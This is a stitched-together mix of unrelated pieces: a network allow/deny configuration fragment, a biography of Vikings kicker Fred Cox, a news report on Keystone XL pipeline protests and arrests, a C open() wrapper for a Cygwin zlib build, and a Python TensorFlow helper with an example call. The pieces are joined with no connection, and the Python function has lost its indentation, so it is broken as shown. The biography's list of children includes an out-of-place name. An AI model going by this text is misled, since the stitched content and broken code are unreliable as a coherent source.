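allow_from = ["10.0.0.0/8", "192.168.1.5"]  # a bare IP gets "/32" appended

[outgoing]
allow_sites = ["Example.COM"]  # lowercased on load
deny_sites = ["ads.example"]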
For other people with the same name, see Fred Cox (disambiguation)
Frederick William Cox is a former National Football League kicker who played for the Minnesota Vikings throughout his career (1963–1977).
Early life
Cox was raised in Monongahela, Pennsylvania, outside Pittsburgh. His parents owned and operated a small grocery store, which is still operated by his brother's family after four generations.
College
Cox played college football at Pittsburgh and was drafted by the Cleveland Browns in the 8th round of the 1961 NFL Draft and the New York Titans in the 28th round of the AFL Draft that same year. He never ended up playing for either team.
Professional career
Known to contemporary Vikings fans as "Freddie the Foot",[citation needed] he is the Vikings' all-time leader in scoring (1,365 points) and field goals (282). He is also one of 11 Vikings to play in all four of their Super Bowl appearances in the 1970s. He led the NFL in scoring in 1969 with 121 points and again in 1970 with 125 and was named first team All-Pro both years. He was also named NFC first team All-Pro in 1971 with 91 points scored. In 1970, he was the NFC kicker in the Pro Bowl game. Cox was also the Vikings' punter in his rookie season with a 38.7 yards per kick average on 70 attempts.[1]
At the time of his retirement, Cox was the NFL's second all-time leading scorer (with 1,365 points) behind George Blanda.
Personal
Cox was first married to Elayne Darrall Cox. Their four children are Darryl Cox, Susan Cox Biasco, Fred A. Cox, and Kim Ok-soon. He is currently married to Bonnie Hope Cox.
Cox is the inventor of the Nerf football. He came up with the idea while still playing for the Vikings.[2] Fred Cox became a licensed chiropractor after his NFL career.[citation needed] Dr. Cox had his practice in Buffalo, Minnesota.[citation needed]
|
More than 200 people were arrested outside the White House Saturday following two weeks of protests directed at President Obama in an effort to persuade him to deny final permitting of a controversial 1,661-mile pipeline that would carry oil from Alberta, Canada, to Port Arthur, Tex.
The arrests follow more than 1,000 arrests made since protesters arrived in late August to conduct sit-ins along Pennsylvania Avenue.
While a White House decision is not expected until December, the protests centered on an environmental impact statement released Aug. 26 by the US State Department that concluded there will be “no significant impact” on natural resources affected by the pipeline route.
If Obama approves the pipeline, a series of additional permits, approvals, and authorizations will follow, with operation set to begin in 2013. The $7 billion, 36-inch pipeline, called the Keystone XL, is expected to deliver 830,000 barrels, or 34.9 million gallons, per day across Montana, South Dakota, Nebraska, Kansas, and Oklahoma into Texas.
TransCanada, a leading North American pipeline operator, started operation of Keystone I, a 36-inch pipeline system, in June 2010, making it possible to deliver Canadian oil to markets across Midwest farmland in several states, from the Dakotas through Illinois. Keystone XL will incorporate a section of that existing pipeline in its delivery through the bottom half of the US.
Environmentalists say TransCanada has a failed safety record regarding its pipeline operations.
Federal regulators shut down Keystone I following two leaks, on May 7 and May 29. The first released 400 barrels, or 16,800 gallons, of crude oil in Sargent County, North Dakota. The second involved a leak at a pump station in Doniphan County, Kan., which released 10 barrels, or 420 gallons, of crude oil into the environment. The pipeline was restarted days later.
In a statement, Russ Girling, TransCanada's president and chief executive officer said “TransCanada takes all incidents very seriously … none of the incidents involved the pipe in the ground. The integrity of Keystone is sound.”
In its environmental impact statement, the US State Department said the existing pipeline experienced 14 spills since June 2010. Seven were 10 gallons or less, two were between 300 and 500 gallons, and one was 21,000 gallons.
The State Department estimates that the maximum the Keystone XL could potentially spill would be 2.8 million gallons along an area of 1.7 miles.
The Canadian government said Thursday it expects Obama to approve the pipeline.
Environment Minister Peter Kent told Reuters that his government “can look forward to eventual approval by the American government” and that TransCanada had “perhaps one of the best records of any pipeline operator” in North America.
Proponents of the pipeline say it will help the troubled US economy. TransCanada says the US will receive $20 billion through new job creation and local property taxes. The State Department report estimates that the pipeline will create between 5,000 and 6,000 new jobs generating up to $419 million in total wages, with nearly $7 billion more flowing into the economy through related spending, such as supplies and permitting.
Environmentalists and their supporters, including Nebraska Gov. Dave Heineman (R) and former Vice President Al Gore, say the pipeline will be a threat to national security because of its potential dangers and that it presents lasting harm to natural resources.
Bill Erasmus, the Assembly of First Nations regional chief for the Northwest Territories told CBS News Saturday that the pipeline will likely harm the Ogallala Aquifer, which covers 450,000 square kilometers and includes portions of Nebraska, South Dakota, Wyoming, Kansas, Colorado, Oklahoma, New Mexico, and Texas.
“If there is a spill in that aquifer, it will mess up the water for about four million people,” Mr. Erasmus said.
The State Department will conduct a series of public meetings Sept. 26-30 in Texas, Kansas, Montana, Nebraska, and South Dakota. A final public hearing is scheduled Oct. 7 in Washington. Another round of protests is expected to take place in Ottawa Sept. 26.
// workaround for zlib with cygwin build
#include <fcntl.h>
#include <stdarg.h>

int _wopen (const char *path, int oflag, ...)
{
	/* open() only consumes a third (mode) argument when O_CREAT is set,
	 * and it must be extracted with va_arg rather than passing the raw
	 * va_list through. */
	int mode = 0;
	if (oflag & O_CREAT) {
		va_list ap;
		va_start (ap, oflag);
		mode = va_arg (ap, int);	/* mode_t promotes to int in varargs */
		va_end (ap);
	}
	return open (path, oflag, mode);
}
|
def _parse_tensor_info_proto(tensor_info):
encoding = tensor_info.WhichOneof("encoding")
dtype = tf.DType(tensor_info.dtype)
shape = tf.TensorShape(tensor_info.tensor_shape)
if encoding == "name":
return ParsedTensorInfo(dtype=dtype, shape=shape, is_sparse=False)
elif encoding == "coo_sparse":
return ParsedTensorInfo(dtype=dtype, shape=shape, is_sparse=True)
else:
raise ValueError("Unsupported TensorInfo encoding %r" % encoding) |
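A hypothetical exercise of the helper above, assuming a TF1-era tensorflow install and that ParsedTensorInfo (defined elsewhere in the same module) is a plain record of dtype, shape, and is_sparse:

import tensorflow as tf
from tensorflow.core.protobuf import meta_graph_pb2

info = meta_graph_pb2.TensorInfo()
info.name = "x:0"  # populates the "name" oneof, i.e. a dense tensor
info.dtype = tf.float32.as_datatype_enum
info.tensor_shape.CopyFrom(tf.TensorShape([None, 128]).as_proto())

parsed = _parse_tensor_info_proto(info)
# -> dtype=tf.float32, shape=(None, 128), is_sparse=False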